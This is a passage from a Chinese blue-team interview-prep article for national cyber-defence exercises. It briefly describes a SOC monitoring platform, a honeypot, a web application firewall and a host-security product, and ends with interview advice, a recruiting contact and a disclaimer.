NGSOC态势感知用于全局监控与日志分析。可以查看告警日志、原始日志、终端日志。告警日志是安全设备产生的告警，原始日志是原始网络流量日志，终端日志是主机上的日志。三个维度结合，可以还原完整的攻击场景。

• 蜜罐

蜜罐用于诱捕与分析。部署一系列危险业务和端口，诱导攻击者进入。当攻击者扫描到蜜罐端口，访问蜜罐页面，就会留下记录。蜜罐可以记录攻击者的操作、工具、IP，用于溯源反制。

长亭的谛听蜜罐有统计分析功能，可以对攻击者进行人物画像；威胁日志功能，对各种日志进行收集；智学习功能，对真实业务进行学习然后生成相应的蜜罐部署。

• 雷池WAF

雷池WAF是基于nginx的Web应用防火墙，主要根据HTTP请求包中的host字段进行正则匹配拦截。它的主要功能包括：人机验证，拦截扫描器；动态防护，对前端源码加密；频率限制，对攻击IP进行封禁；IP分组，自动把恶意IP加入黑名单；智能AI分析，用大模型分析恶意数据包。

• 椒图

椒图是主机安全产品，可以配置针对服务器非白名单账号和登录IP的监控。在椒图平台，告警分析payload通常在请求包的请求头URL，或者在POST数据包中。威胁感知模块可以查看告警的全部信息。

写在最后

护网面试是对技术、经验和心态的综合考验

面试时，不仅要准确回答问题，更要展示你的思考过程和解决问题的逻辑。如果你能扛到AI安全的第七层，那AI安全就不再是加分项，而是你区别于其他人的核心竞争力。

护网期间，要记住三件事：遇到不确定的告警，先确认再行动；遇到紧急情况，先隔离再排查；遇到不会的问题，先思考再请教。

最后，祝大家面试顺利，护网成功。

（有意护网投简历的加v加群：JX-defends-ideals，备注2026年护网）

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：金夏安全 金夏 金夏《【护网面经】蓝队面经分享（详细版）》